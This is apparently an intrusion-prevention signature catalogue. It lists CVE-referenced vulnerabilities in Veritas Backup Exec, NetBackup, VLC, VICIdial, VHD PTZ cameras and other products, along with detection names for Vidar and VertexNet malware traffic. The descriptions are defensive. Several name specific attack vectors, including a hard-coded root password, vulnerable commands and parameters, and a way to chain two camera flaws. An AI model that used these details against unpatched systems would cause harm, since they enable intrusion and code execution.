About this vulnerability:

Buffer overflow vulnerability in Verisign MPKI

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Verisign MPKI

Type:

Buffer Overflow

Description:

There is a buffer overflow with a specific method of Verisign MPKI ConfigChk ActiveX control.

Situation:

HTTP_SS-Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
File-Text_Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1083

BID-22671
http://www.securityfocus.com/bid/22671

BID-22676
http://www.securityfocus.com/bid/22676

OSVDB-33479
http://www.osvdb.org/33479

Veritas-Backup-Exec-Agent-Authentication-Bypass

About this vulnerability:

Authentication bypass vulnerability in the Veritas Backup Exec Agent

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Veritas Software NetBackup

Type:

Input Validation

Description:

The Veritas Backup Exec Agent has an authentication-related vulnerability. The Agent has a hard coded password for the user 'root' when the MD5 authentication method is used. A remote attacker is able to use this known password to connect to Veritas Backup Exec Agents and download arbitrary files from the victim hosts.

Situation:

Generic_Veritas-Backup-Exec-Agent-Authentication-Bypass

References:

CVE-2005-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2611

BID-14551
http://www.securityfocus.com/bid/14551

Veritas-Backup-Exec-Agent-Browser-BOF

About this vulnerability:

Buffer overflow vulnerability in Veritas Backup Exec

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

Veritas Backup Exec versions 8.x and 9.x are vulnerable to a stack-based buffer overflow caused by improper bounds checking by the Agent Browser service when handling incoming registration requests. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system.

Situation:

Generic_Veritas-Backup-Exec-Agent-Browser-BOF

References:

CVE-2004-1172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1172

BID-11974
http://www.securityfocus.com/bid/11974

OSVDB-12418
http://www.osvdb.org/12418

Veritas-Backup-Exec-Agent-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Veritas Backup Exec Agent

Risk:

High

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

Veritas Backup Exec Remote Agent has a buffer overflow vulnerability in the handling of authentication requests. A remote attacker can exploit this vulnerability to execute arbitrary code via a client authentication request (CONNECT_CLIENT_AUTH) with authentication method type 3 and a long password argument.

Situation:

Generic_Veritas-Backup-Exec-Agent-Buffer-Overflow

References:

CVE-2005-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0773

BID-14022
http://www.securityfocus.com/bid/14022

OSVDB-17624
http://www.osvdb.org/17624

Veritas-Backup-Exec-Agent-Command-Execution-Vulnerability-CVE-2021-27878

About this vulnerability:

An attempt to exploit a vulnerability in Veritas Software NetBackup detected

Risk:

High

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Insecure Configuration

Description:

An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. The attacker could use one of these commands to execute an arbitrary command on the system using system privileges.

Situation:

Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

References:

CVE-2021-27878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27878

Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service

About this vulnerability:

A vulnerability in VERITAS Software BackUp Exec

Risk:

Moderate

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software BackUp Exec

Type:

Null Pointer Dereference

Description:

There exists a denial of service vulnerability in VERITAS Backup Exec Agent for Windows. The flaw is caused by improper handling of exceptional conditions raised by malformed request packets. A remote attacker could leverage this issue to cause a denial of service on a vulnerable machine.

Situation:

Generic_CS-Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service

References:

CVE-2005-0772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772

BID-14021
http://www.securityfocus.com/bid/14021

Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

About this vulnerability:

An attempt to exploit a vulnerability in Veritas Software NetBackup detected

Risk:

High

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Insecure Configuration

Description:

An issue was discovered in Veritas Backup Exec before 21.2. It supports multiple authentication schemes, and SHA authentication is one of them. This authentication scheme is no longer used in current versions of the product, but had not yet been disabled. An attacker could remotely exploit this scheme to gain unauthorized access to an Agent and execute privileged commands.

Situation:

Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

References:

CVE-2021-27877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27877

Veritas-Backup-Exec-Agent-Improper-File-Access-Vulnerability-CVE-2021-27876

About this vulnerability:

An attempt to exploit a vulnerability in Veritas Software NetBackup detected

Risk:

High

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Insecure Configuration

Description:

An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. By using crafted input parameters in one of these commands, an attacker can access an arbitrary file on the system using System privileges.

Situation:

Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

References:

CVE-2021-27876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27876

Veritas-Backup-Exec-Server-Remote-Registry-Access

About this vulnerability:

Security bypass vulnerability in VERITAS Backup Exec for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Veritas Software BackUp Exec

Type:

Malfunction

Description:

There is a security bypass vulnerability in VERITAS Backup Exec for Windows. A successful exploit leads to an unauthorized administrative access to the Windows registry on the target system.

Situation:

MSRPC-TCP_CPS-Veritas-Backup-Exec-Server-Anonymous-Registry-Access
Generic_Veritas-Backup-Exec-Server-Anonymous-Registry-Access

References:

CVE-2005-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0771

BID-14020
http://www.securityfocus.com/bid/14020

OSVDB-17627
http://www.osvdb.org/17627

Veritas-NetBackup-Java-Authentication-Service-Compromise

About this vulnerability:

Format string vulnerability in Veritas NetBackup

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Format String

Description:

Veritas NetBackup Authentication Service has a format strings vulnerability in the bpjava-msvc daemon. A remote attacker can connect to the server and issue a COMMAND_LOGON_TO_MSERVER command with format string specifiers in the supplied user name to exploit the flaw. A successful attack can result in arbitrary code execution with system privileges. Both the server and the client software are vulnerable and accept connections to the port 13722/tcp.

Situation:

Generic_Veritas-NetBackup-Java-Authentication-Service-Compromise

References:

CVE-2005-2715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2715

BID-15079
http://www.securityfocus.com/bid/15079

Veritas-NetBackup-Remote-Command-Execution

About this vulnerability:

A Veritas NetBackup Remote Command Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Input Validation

Description:

A vulnerability in multiple versions of Veritas Software NetBackup which allows remote attackers to execute arbitrary commands via the bpjava-susvc process.

Situation:

Generic_CS-Veritas-NetBackup-Remote-Command-Execution

References:

CVE-2004-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1389

BID-11494
http://www.securityfocus.com/bid/11494

OSVDB-11026
http://www.osvdb.org/11026

Veritas-NetBackup-Vnetd-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Veritas NetBackup vnetd process

Risk:

High

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

The vnetd process in Veritas NetBackup software has a buffer overflow vulnerability. The process fails to validate the length of arguments sent to it. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

Generic_Veritas-NetBackup-Vnetd-Buffer-Overflow

References:

CVE-2006-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0991

BID-17264
http://www.securityfocus.com/bid/17264

Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in VERITAS NetBackup Server volume manager daemon

Risk:

High

First detected in:

sgpkg-ips-122-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Veritas Software NetBackup

Type:

Buffer Overflow

Description:

VERITAS NetBackup has a buffer overflow vulnerability in the volume manager daemon. A specially crafted request to the daemon will result in a buffer overflow and allow unauthenticated remote attackers to execute arbitrary code with root/system privileges on a vulnerable host.

Situation:

Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow-2
Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow

References:

CVE-2005-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3116

BID-15353
http://www.securityfocus.com/bid/15353

OSVDB-20674
http://www.osvdb.org/20674

Versa-Director-Favicon-Unrestricted-File-Upload-CVE-2024-39717

About this vulnerability:

An attempt to exploit a vulnerability in Versa Director detected

Risk:

High

First detected in:

sgpkg-ips-1821-5242

Last changed:

sgpkg-ips-1821-5242

Platform:

Generic

Software:

Versa Director

Type:

Input Validation

Description:

The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with "Provider-Data-Center-Admin" or "Provider-Data-Center-System-Admin" permissions. The "Change Favicon" option can be misused to upload a malicious file ending with ".png" extension to masquerade as an image file.

Situation:

File-Zip_Suspicious-JAR-File-With-Image-Extension

References:

CVE-2024-39717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39717

VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in VersalSoft HTTP Upload ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

VersalSoft HTTP File Upload

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the VersalSoft HTTP File Upload ActiveX control. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control.

Situation:

HTTP_SS-VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-BOF

References:

CVE-2007-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2563

BID-23853
http://www.securityfocus.com/bid/23853

OSVDB-34339
http://www.osvdb.org/34339

Version-Control-Metafile-Access

About this vulnerability:	An attempt to access a configuration/environment file detected
Risk:	High
First detected in:	sgpkg-ips-1795-5242
Last changed:	sgpkg-ips-1795-5242
Platform:	Generic
Software:	Any Software
Type:	Insecure Configuration
Description:	This fingerprint detects attempts to access common version control systems' metafiles (e.g., ".git/config"). These files may contain user credentials, and if misconfigured, they could be exposed to the Internet.
Situation:	HTTP_CSU-Version-Control-Configuration-Access

Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Verso NetPerformer

Risk:

Low

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Verso NetPerformer

Type:

Insecure Configuration

Description:

There is a buffer overflow in the telnet service in Verso NetPerformer FRAD ACT SDM-95xx 7.xx (R1) and earlier, SDM-93xx 10.x.x (R2) and earlier, and SDM-92xx 9.x.x (R1) and earlier allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via a long username.

Situation:

Telnet_CS-Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability

References:

CVE-2006-4832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4832

BID-19989
http://www.securityfocus.com/bid/19989

Vertexnet-Bot

About this vulnerability:	VertexNet Bot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	VertexNet is a Botnet that is used for various malicious purposes.
Situation:	HTTP_CSU-Vertexnet-Bot-Activity

Very-Large-XML-File

About this vulnerability:	A very large XML file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-502-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	A very large XML file was detected
Situation:	File-TextId_Very-Large-XML-File

VeryPDF-PDFView-Heap-Overflow

About this vulnerability:

A VeryPDF PDFView Heap Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

VeryPDF PDFView

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in VeryPDF PDFView, version 2.0.0.1, in the PDFVIEW.PdfviewCtrl.1 ActiveX control in pdfview.ocx, which allows remote attackers to execute arbitrary code via a long first argument to the OpenPDF method.

Situation:

File-Text_VeryPDF-PDFView-Heap-Overflow

References:

CVE-2008-5492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5492

BID-32313
http://www.securityfocus.com/bid/32313

OSVDB-49871
http://www.osvdb.org/49871

VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956

About this vulnerability:

A vulnerability in VHD PTZ camera firmware

Risk:

High

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1796-5242

Platform:

Generic

Software:

VHD PTZ

Type:

Input Validation

Description:

Insufficient authentication in the VHD PTZ camera firmware versions prior to 6.3.40 allows a remote attacker to bypass the authentication requirements for various cgi scripts. This vulnerability affects PTZOptics cameras, Multicam Systems SAS cameras, and SMTAV Corporation IP cameras based on Hisilicon Hi3516A V600.

Situation:

HTTP_CS-VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956

References:

CVE-2024-8956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8956

VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957

About this vulnerability:

A vulnerability in VHD PTZ

Risk:

High

First detected in:

sgpkg-ips-1796-5242

Last changed:

sgpkg-ips-1796-5242

Platform:

Generic

Software:

VHD PTZ

Type:

Input Validation

Description:

A command injection vulnerability in the VHD PTZ camera firmware versions prior to 6.3.40 allows a remote attacker to execute arbitrary OS commands via crafted HTTP requests. This vulnerability affects PTZOptics cameras, Multicam Systems SAS cameras, and SMTAV Corporation IP cameras based on Hisilicon Hi3516A V600. If chained together with CVE-2024-8956, the authentication requirement for exploiting this vulnerability can be bypassed.

Situation:

HTTP_CRL-VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957

References:

CVE-2024-8957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8957

Viber-URI-Handler-Remote-Code-Execution

About this vulnerability:

A vulnerability in Viber

Risk:

High

First detected in:

sgpkg-ips-1177-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Viber

Type:

Input Validation

Description:

A vulnerability in Viber, versions 10.5.0.23 and before, which allows a remote attacker to execute arbitrary code by enticing a user to open a malicious web page, due to improper sanitization of the user supplied data.

Situation:

File-Text_Viber-URI-Handler-Remote-Code-Execution
File-TextId_Viber-URI-Handler-Remote-Code-Execution

References:

CVE-2019-12569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12569

VICIDIAL-Authenticated-Remote-Code-Execution

About this vulnerability:

A vulnerability in VICIdial

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Unix; Linux

Software:

VICIDIAL

Type:

Input Validation

Description:

A vulnerability in VICIdial, version 2.14-917a, which allows remote users authenticated as "agent" to execute arbitrary shell commands through multiple user controlled request parameters.

Situation:

HTTP_CRL-VICIDIAL-Authenticated-Remote-Code-Execution

References:

CVE-2024-8504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8504

VICIDIAL-Dialer-SQL-And-Command-Injection

About this vulnerability:

A VICIDIAL Dialer SQL And Command Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VICIDIAL

Type:

Input Validation

Description:

A vulnerability in VICIDIAL Dialer, versions 2.8-403a, 2.7, 2.7RC1, and earlier, which allows remote attckers to perform SQL and command injections via the campaign variable in SCRIPT_multirecording_AJAX.php, the server_ip parameter in manager_send.php, and extension parameter in manager_send.php. This covers CVE-2013-4467 and CVE-2013-4468.

Situation:

HTTP_CRL_VICIDIAL-Dialer-SQL-And-Command-Injection

References:

CVE-2013-4467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4467

BID-63340
http://www.securityfocus.com/bid/63340

OSVDB-98903
http://www.osvdb.org/98903

VICIDIAL-Multiple-Authenticated-SQLi

About this vulnerability:

A vulnerability in VICIdial.

Risk:

High

First detected in:

sgpkg-ips-1507-5242

Last changed:

sgpkg-ips-1507-5242

Platform:

Generic

Software:

VICIDIAL

Type:

Input Validation

Description:

A vulnerability in VICIdial, versions 2.14b0.5 prior to svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable), which allows remote attackers to gain sensitive information via SQL injection to multiple parameters. CVE-2022-34876, CVE-2022-34877, and CVE-2022-34878.

Situation:

HTTP_CS-VICIDIAL-Multiple-Authenticated-SQLi

References:

CVE-2022-34876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34876

Victory-FTP-Server-Denial-Of-Service

About this vulnerability:

A Victory FTP Server Denial Of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Victory FTP

Type:

Null Pointer Dereference

Description:

A vulnerability in Victory FTP, version 5.0, which allows remote attackers to cause a denial of service condition via a LIST command followed by a forward slash backslash "/\". This also covers CVE-2008-2031.

Situation:

FTP_CS-Victory-FTP-Server-Denial-Of-Service

References:

CVE-2008-6829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6829

OSVDB-44608
http://www.osvdb.org/44608

Vidar-Malware-Infection-Traffic

About this vulnerability:	Vidar Backdoor malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1321-5242
Last changed:	sgpkg-ips-1321-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Vidar Infostealer malware infection traffic was detected.
Situation:	HTTP_CS-Vidar-Malware-Infection-Traffic

VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Directory Traversal

Description:

There is a format-string vulnerability in VideoLAN VLC media player.

Situation:

File-TextId_VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow

References:

CVE-2007-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0017

BID-21852
http://www.securityfocus.com/bid/21852

OSVDB-31163
http://www.osvdb.org/31163

VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in VideoLAN VLC

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VideoLAN VLC

Type:

Malfunction

Description:

There is a memory corruption vulnerability in VideoLAN VLC media player ActiveX control. The flaw is due to recursive object release. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web site. Successful attack may allow for arbitrary code being injected and executed with the privileges of the currently logged on user.

Situation:

HTTP_SS-VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
File-Text_VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption

References:

CVE-2007-6262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6262

BID-26675
http://www.securityfocus.com/bid/26675

VideoLAN-VLC-AMV-Code-Execution

About this vulnerability:

A VideoLAN VLC AMV Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-745-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VideoLAN VLC

Type:

Input Validation

Description:

A vulnerability in VideoLAN VLC, versions before 1.1.8, which allows remote attackers to execute arbitrary code via a crafted width in an AMV file.

Situation:

File-Text_VideoLAN-VLC-AMV-Code-Execution

References:

CVE-2010-3275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3275

OSVDB-71277
http://www.osvdb.org/71277

VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in VideoLAN VLC Media Player

Risk:

High

First detected in:

sgpkg-ips-187-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in VideoLAN VLC Media Player. The vulnerability is caused by a buffer overflow when playing a specially crafted RealText (.rt) subtitle file. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted RealText subtitle file. Successful exploitation would cause a stack buffer overflow allowing the attacker to execute arbitrary code with the privileges of the logged in users.

Situation:

HTTP_SS-VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
File-TextId_VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow

References:

CVE-2008-5036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036

BID-32125
http://www.securityfocus.com/bid/32125

VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow

About this vulnerability:	A vulnerability in VideoLAN VLC
Risk:	Low
First detected in:	sgpkg-ips-229-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	VideoLAN VLC
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in VideoLAN VLC Media Player. The vulnerability is due to a boundary error in "Win32AddConnection()" the function in the "modules/access/smb.c" file while parsing specially-crafted SMB paths. Remote attackers can exploit this vulnerability, for example, by enticing target users to open a playlist file with an overly long "smb://" URI, which causes a stack buffer overflow, or by sending a specially-crafted request to the VLC web interface. In an attack case where code injection is successful, the behavior of the target depends on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack case where code injection is not successful, the affected application terminates abnormally.
Situation:	HTTP_CSU-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow HTTP_SS-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow File-TextId_VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-BOF

VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability

About this vulnerability:	A vulnerability in VideoLAN VLC Media Player
Risk:	High
First detected in:	sgpkg-ips-274-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	VideoLAN VLC
Type:	Malfunction
Description:	There is a memory corruption vulnerability in VideoLAN VLC media player. The vulnerability is due to an invalid free error when processing SMB URIs. Remote attackers may exploit this vulnerability by enticing target users to open a maliciously crafted playlist file, such as a XSPF file, in a vulnerable version of VideoLAN VLC media player.
Situation:	HTTP_CRL-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free HTTP_SS-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free File-TextId_VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free

VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC Media Player

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in VLC Media Player.

Situation:

HTTP_SS-VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
File-Binary_VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
File-Binary_Invalid-Content-Type-For-VideoLAN-VLC-Media-Player

References:

CVE-2011-0522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0522

BID-46008
http://www.securityfocus.com/bid/46008

VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC Media Player

Risk:

Low

First detected in:

sgpkg-ips-229-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Integer Overflow

Description:

There is a vulnerability in VideoLAN VLC Media Player. The vulnerability is due to an integer overflow during the calculation of the size of a heap buffer. An unauthenticated remote attacker can exploit this vulnerability by enticing a user to play a specially-crafted Wave/WAV file. Successful exploitation causes a heap buffer overflow, allowing the attacker to execute arbitrary code on the vulnerable system.

Situation:

HTTP_SS-VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
File-RIFF_VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow

References:

CVE-2008-2430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2430

BID-30058
http://www.securityfocus.com/bid/30058

VideoLAN-VLC-Renamed-Zip-File-Handling-Code-Execution

About this vulnerability:

A vulnerability in VideoLAN VLC Media Player

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in VLC Media Player.

Situation:

File-Zip_Conflicting-Content-Type-AVI

References:

BID-40428
http://www.securityfocus.com/bid/40428

VideoLAN-VLC-Ty-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in VideoLAN VLC. The vulnerability is due to a buffer overflow when opening TiVo TY media files. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted TiVo TY media file. Successful exploitation would cause a stack buffer overflow allowing the attacker to execute arbitrary code with the privileges of the logged in user.

Situation:

HTTP_SS-VideoLAN-VLC-Ty-Processing-Buffer-Overflow
File-Binary_VideoLAN-VLC-Ty-Processing-Buffer-Overflow

References:

CVE-2008-4654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4654

BID-31813
http://www.securityfocus.com/bid/31813

VideoLAN-VLC-XSPF-Memory-Corruption

About this vulnerability:

A vulnerability in VideoLAN Project VLC Media Player

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Malfunction

Description:

There is a memory corruption vulnerability in VideoLAN VLC Media Player. The flaw is due to insufficient data validation when processing XSPF playlist files. An attacker may entice the target user to open a crafted XSPF file to exploit this vulnerability. Successful attack may allow arbitrary code injection and execution with privileges of the currently logged on user.

Situation:

HTTP_SS-VideoLAN-VLC-XSPF-Memory-Corruption
File-TextId_VideoLAN-VLC-XSPF-Memory-Corruption

References:

CVE-2008-4558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558

BID-31758
http://www.securityfocus.com/bid/31758

VideoLAN-VLV-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC

Risk:

Moderate

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Integer Overflow

Description:

There exists a vulnerability in VideoLAN VLC Media Player.

Situation:

HTTP_SS-VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
File-Binary_VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow

References:

CVE-2008-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5276

BID-32545
http://www.securityfocus.com/bid/32545

OSVDB-50333
http://www.osvdb.org/50333

Vim-Modelines-Remote-Command-Execution

About this vulnerability:

A Vim Modelines Remote Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-836-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Vim

Type:

Input Validation

Description:

A vulnerability in Vim, versions before 8.0.0056, which allows remote attackers to execute arbitrary commands due to the lack of input validation.

Situation:

File-Text_Vim-Modelines-Remote-Command-Execution

References:

CVE-2016-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248

Vim-Retab-Integer-Overflow

About this vulnerability:

A vulnerability in the Vim retab command.

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

